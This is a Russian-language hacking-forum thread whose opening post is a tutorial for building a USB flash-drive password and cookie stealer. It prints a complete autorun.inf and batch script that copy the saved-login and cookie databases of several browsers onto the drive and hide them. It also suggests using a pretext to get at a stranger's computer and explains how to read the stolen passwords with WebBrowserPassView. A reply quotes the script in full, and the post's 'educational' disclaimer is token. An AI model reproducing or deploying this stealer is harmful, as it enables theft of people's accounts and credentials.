• Добро пожаловать в Пиратскую Бухту! Чтобы получить полный доступ к форуму пройдите регистрацию!
  • Гость, стой!

    В бухте очень не любят флуд и сообщения без смысловой нагрузки!
    Чтобы не получить бан, изучи правила форума!

    Если хотите поблагодарить автора темы, или оценить реплику пользователя, для этого есть кнопки: "Like" и "Дать на чай".

Слив Как создать cookie-стиллер из флешки

CIFOHbKA

Гардемарин
Местный
Регистрация
30.11.17
Сообщения
148
Онлайн
6д 23ч 11м
Сделки
0
Нарушения
0 / 3
Как создать cookie-стиллер на флешке


Всем доброго времени суток, пираты!

В сегодняшней статье мы с вами сделаем cookie-стиллер из обычной флешки. Надеюсь, вам понравится!

Замечу, что эта статья написана только для образовательных целей. Мы никого ни к чему не призываем, только в целях ознакомления! Автор не несёт ответственности за ваши действия!
Мы рассмотрим простой, но эффективный способ, быстро узнать пароли, который, неосторожный пользователь, а таких много, поверьте, сохранил в браузере, это ведь так удобно, правда, не надо запоминать пароль, не нужно каждый раз его вводить ручками и т.д. плюсов масса, но, есть один минус, и большой, украсть такие пароли вообще не проблема.

Сегодня, мы быстро и вообще не напрягаясь сделаем из простой флешки cookie-стиллер, а потом расшифруем файлы cookie, чтобы узнать все пароли сохраненные в браузере.

Для начала, вы должны понимать, что такое файл cookie, это, в своем роде, такой зашифрованный текстовый документ в котором храниться основная информация о пользователе.

Но хватит теории, приступим.


Инструкция:

Во первых, нам понадобиться флешка.

На ней мы создадим два текстовых файла:


  • первый – autorun.inf
  • второй – stealer.bat
Не забудьте включить отображение расширений файлов, чтоб можно было изменить txt на inf и bat соответственно, это если вдруг кто не догадался

дальше, в файле autorun мы пишем:

[AutoRun]
Open=”stealer.bat”

Всё, сохранили, закрыли. Это автозапуск нашего стиллера


В файле stealer.bat пишем:

@echo off
md %~d0\Mozilla
md %~d0\0pera
md %~d0\Google
md %~d0\Yandex
md %~d0\Amigo
CD/D %APPDATA%\Opera\Opera\
cls
copy /y wand.dat %~d0\Opera\
copy /y cookies.dat %~d0\Opera\
cd %AppData%\Mozilla\Firefox\Profiles\*.default
copy /y cookies.sqlite %~d0\Mozilla
copy /y key3.db %~d0\Mozilla
copy /y signons.sqlite %~d0\Mozilla
copy /y %AppData%\Mozilla\Firefox\Profiles\*.default %~d0\Mozilla
cd %localappdata%\Google\Chrome\User Data\Default
cls
copy /y "%localappdata%\Google\Chrome\User Data\Default\Login Data" "%~d0\Google"
cd %localappdata%\Yandex\YandexBrowser\User Data\Default
copy /y "%localappdata%\Yandex\YandexBrowser\User Data\Default\Login Data" "%~d0\Yandex"
cd %localappdata%\Amigo\User Data\Default
copy /y "%localappdata%\Amigo\User Data\Default\Login Data" "%~d0\Amigo"
cls
ATTRIB -R -A -S -H
attrib +h %~d0\Mozilla
attrib +h %~d0\Opera
attrib +h %~d0\Google
attrib +h %~d0\Yandex
attrib +h %~d0\Amigo
attrib +h %~d0\search.bat
attrib +h %~d0\new
attrib +h %~d0\autorun.inf
del: autorun.inf?

Тоже сохраняем, закрываем. После чего заходим в свойства этих файлов и делаем их скрытыми. Стиллер готов.

Теперь, стоит остановиться на некоторых нюансах. А именно:

В Windows 10 (и 8) наш авторан не сработает, там эта возможность банально отключена. Поэтому придется придумать способ получить доступ к компьютеру, и ручками запустить файл stealer.bat, благо процесс занимает очень мало времени, а придумать предлог сесть на минуту за чужой компьютер много ума не надо, ведь так? На всех предыдущих версиях винды, всё произойдет само как-только человек вставит флешку в usb порт.

Следующий нюанс, антивирус на эту манипуляцию никак не отреагирует, поэтому антивируса боятся не стоит, а вот фаервол всё это дело заблокирует на раз два. Тут важно понимать, что человек, который установил и настроил фаервол, походу что-то где-то понимает и уж наверняка не будет хранить пароли в браузере, к такому персонажу нужен более тонкий подход, в следующих видео придумаем.

По нюансам всё. Теперь дальше, cookie то мы подрезали, что с ними делать-то?


Рассказываю. Уже на своем компьютере, в идеале на виртуальной машине, удаляем нафиг свои куки. И вставляем на их место те которые у нас на флешке. Если вдруг кто не знает где храниться cookie, вот подсказка:


Google Chrome:
C:\Users\Пользователь\AppData\Local\Google\Chrome\User Data\Default (или Profile 1)\файл “Cookies” без расширения

Opera:
C:\Users\Пользователь\AppData\Roaming\Opera Software\Opera Stable\файл “Cookies”

Mozilla Firefox:
C:\Users\Пользователь\AppData\Roaming\Mozilla\Firefox\Profiles\qx1fqa6b.Default User\ файл “cookies.sqlite”

Internet Explorer 11:
C:\Users\Пользователь\AppData\Local\Microsoft\Windows\INetCookies\

C:\Users\Пользователь\AppData\Roaming\Microsoft\Windows\Cookies\


(Чтобы не стать жертвой подобных схем, проверяйте "левые" флешки и не используйте выше упомянутые браузеры!!!)

Скопировали. Теперь качаем программу WebBrowserPassView и запускаем, всё. Видим на каких сайтах какие учётные записи и какие там пароли и используем их во благо и в целях безопасности


Screenshot.png


_____________________________________________________________________________________________
На этом все, всем спасибо за внимание!
 

RubenRibnik

Юнга
Читатель
Регистрация
21.09.20
Сообщения
42
Онлайн
3д 5ч 49м
Сделки
0
Нарушения
0 / 0
Спасибо за подсказку зофтинки WebBrowserPassView. Очень удобная прога.
 

ТОКИО

Боцман
Изгнан
Регистрация
27.09.20
Сообщения
287
Онлайн
13д 13ч 25м
Сделки
0
Нарушения
0 / 0
хороший мануал спасибо и лайк от души.
 

den983

Пират
Читатель
Регистрация
09.04.20
Сообщения
58
Онлайн
8д 15ч 53м
Сделки
0
Нарушения
2 / 1
Чёт слишком просто. Блэцк хаты, вы чего?) А подойти и запустить батник это вообще...
 

painAll

Пират
Читатель
Регистрация
29.09.20
Сообщения
50
Онлайн
9д 15ч 39м
Сделки
0
Нарушения
0 / 2
Это все интересно, но что делать если на сайт зашли, но пароль не сохранили, WebBrowserPassView такие пароли не показывает
 

404reboot

Незнакомец
Изгнан
Регистрация
14.08.20
Сообщения
16
Онлайн
4д 1ч 31м
Сделки
0
Нарушения
0 / 3
Как создать cookie-стиллер на флешке


Всем доброго времени суток, пираты!

В сегодняшней статье мы с вами сделаем cookie-стиллер из обычной флешки. Надеюсь, вам понравится!


Мы рассмотрим простой, но эффективный способ, быстро узнать пароли, который, неосторожный пользователь, а таких много, поверьте, сохранил в браузере, это ведь так удобно, правда, не надо запоминать пароль, не нужно каждый раз его вводить ручками и т.д. плюсов масса, но, есть один минус, и большой, украсть такие пароли вообще не проблема.

Сегодня, мы быстро и вообще не напрягаясь сделаем из простой флешки cookie-стиллер, а потом расшифруем файлы cookie, чтобы узнать все пароли сохраненные в браузере.

Для начала, вы должны понимать, что такое файл cookie, это, в своем роде, такой зашифрованный текстовый документ в котором храниться основная информация о пользователе.

Но хватит теории, приступим.


Инструкция:

Во первых, нам понадобиться флешка.

На ней мы создадим два текстовых файла:


  • первый – autorun.inf
  • второй – stealer.bat
Не забудьте включить отображение расширений файлов, чтоб можно было изменить txt на inf и bat соответственно, это если вдруг кто не догадался

дальше, в файле autorun мы пишем:

[AutoRun]
Open=”stealer.bat”

Всё, сохранили, закрыли. Это автозапуск нашего стиллера


В файле stealer.bat пишем:

@echo off
md %~d0\Mozilla
md %~d0\0pera
md %~d0\Google
md %~d0\Yandex
md %~d0\Amigo
CD/D %APPDATA%\Opera\Opera\
cls
copy /y wand.dat %~d0\Opera\
copy /y cookies.dat %~d0\Opera\
cd %AppData%\Mozilla\Firefox\Profiles\*.default
copy /y cookies.sqlite %~d0\Mozilla
copy /y key3.db %~d0\Mozilla
copy /y signons.sqlite %~d0\Mozilla
copy /y %AppData%\Mozilla\Firefox\Profiles\*.default %~d0\Mozilla
cd %localappdata%\Google\Chrome\User Data\Default
cls
copy /y "%localappdata%\Google\Chrome\User Data\Default\Login Data" "%~d0\Google"
cd %localappdata%\Yandex\YandexBrowser\User Data\Default
copy /y "%localappdata%\Yandex\YandexBrowser\User Data\Default\Login Data" "%~d0\Yandex"
cd %localappdata%\Amigo\User Data\Default
copy /y "%localappdata%\Amigo\User Data\Default\Login Data" "%~d0\Amigo"
cls
ATTRIB -R -A -S -H
attrib +h %~d0\Mozilla
attrib +h %~d0\Opera
attrib +h %~d0\Google
attrib +h %~d0\Yandex
attrib +h %~d0\Amigo
attrib +h %~d0\search.bat
attrib +h %~d0\new
attrib +h %~d0\autorun.inf
del: autorun.inf?

Тоже сохраняем, закрываем. После чего заходим в свойства этих файлов и делаем их скрытыми. Стиллер готов.

Теперь, стоит остановиться на некоторых нюансах. А именно:

В Windows 10 (и 8) наш авторан не сработает, там эта возможность банально отключена. Поэтому придется придумать способ получить доступ к компьютеру, и ручками запустить файл stealer.bat, благо процесс занимает очень мало времени, а придумать предлог сесть на минуту за чужой компьютер много ума не надо, ведь так? На всех предыдущих версиях винды, всё произойдет само как-только человек вставит флешку в usb порт.

Следующий нюанс, антивирус на эту манипуляцию никак не отреагирует, поэтому антивируса боятся не стоит, а вот фаервол всё это дело заблокирует на раз два. Тут важно понимать, что человек, который установил и настроил фаервол, походу что-то где-то понимает и уж наверняка не будет хранить пароли в браузере, к такому персонажу нужен более тонкий подход, в следующих видео придумаем.

По нюансам всё. Теперь дальше, cookie то мы подрезали, что с ними делать-то?


Рассказываю. Уже на своем компьютере, в идеале на виртуальной машине, удаляем нафиг свои куки. И вставляем на их место те которые у нас на флешке. Если вдруг кто не знает где храниться cookie, вот подсказка:


Google Chrome:
C:\Users\Пользователь\AppData\Local\Google\Chrome\User Data\Default (или Profile 1)\файл “Cookies” без расширения

Opera:
C:\Users\Пользователь\AppData\Roaming\Opera Software\Opera Stable\файл “Cookies”

Mozilla Firefox:
C:\Users\Пользователь\AppData\Roaming\Mozilla\Firefox\Profiles\qx1fqa6b.Default User\ файл “cookies.sqlite”

Internet Explorer 11:
C:\Users\Пользователь\AppData\Local\Microsoft\Windows\INetCookies\

C:\Users\Пользователь\AppData\Roaming\Microsoft\Windows\Cookies\


(Чтобы не стать жертвой подобных схем, проверяйте "левые" флешки и не используйте выше упомянутые браузеры!!!)

Скопировали. Теперь качаем программу WebBrowserPassView и запускаем, всё. Видим на каких сайтах какие учётные записи и какие там пароли и используем их во благо и в целях безопасности


Посмотреть вложение 17938

_____________________________________________________________________________________________
На этом все, всем спасибо за внимание!
Сейчас не проканает, автозагрузку с 7 не помню какой версией отключили, только если создать badusb
 

mikes53

Юнга
Читатель
Регистрация
05.05.19
Сообщения
20
Онлайн
3д 12ч 55м
Сделки
0
Нарушения
0 / 0
Тема годная
Но по моему на сегодняшний день любой знает как сделать такой стиллер
И даже уже более доработанный
А вот как сделать стиллер в виде файла который удалённо будет тебе передавать инфу это куда сложнее и интереснее
 
Сверху